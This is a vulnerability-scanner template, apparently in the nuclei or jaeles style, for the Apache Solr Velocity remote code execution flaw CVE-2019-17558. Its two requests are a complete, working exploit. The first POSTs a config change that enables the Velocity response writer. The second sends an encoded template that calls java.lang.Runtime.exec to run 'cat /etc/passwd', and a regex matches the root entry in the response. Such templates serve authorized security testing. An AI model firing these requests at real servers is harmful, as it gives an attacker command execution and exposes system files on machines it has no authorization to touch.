id: CVE-2019-17558
info:
  name: Solr RCE

requests:
  - method: POST
    redirect: true
    url: >-
     {{.BaseURL}}/solr/test/config
    headers:
      - Content-Type: application/json
    body: >-
      {
        "update-queryresponsewriter": {
          "startup": "lazy",
          "name": "velocity",
          "class": "solr.VelocityResponseWriter",
          "template.base.dir": "",
          "solr.resource.loader.enabled": "true",
          "params.resource.loader.enabled": "true"
        }
      }
  - method: GET
    url: >-
     {{.BaseURL}}/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(cat%20%2Fetc%2Fpasswd))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
    headers:
      - Content-Type: application/json
    detections:
      - >-
        StatusCode() == 200 && RegexSearch("response", "root:[x*]:0:0:")

reference:
  - https://www.cvebase.com/cve/2019/17558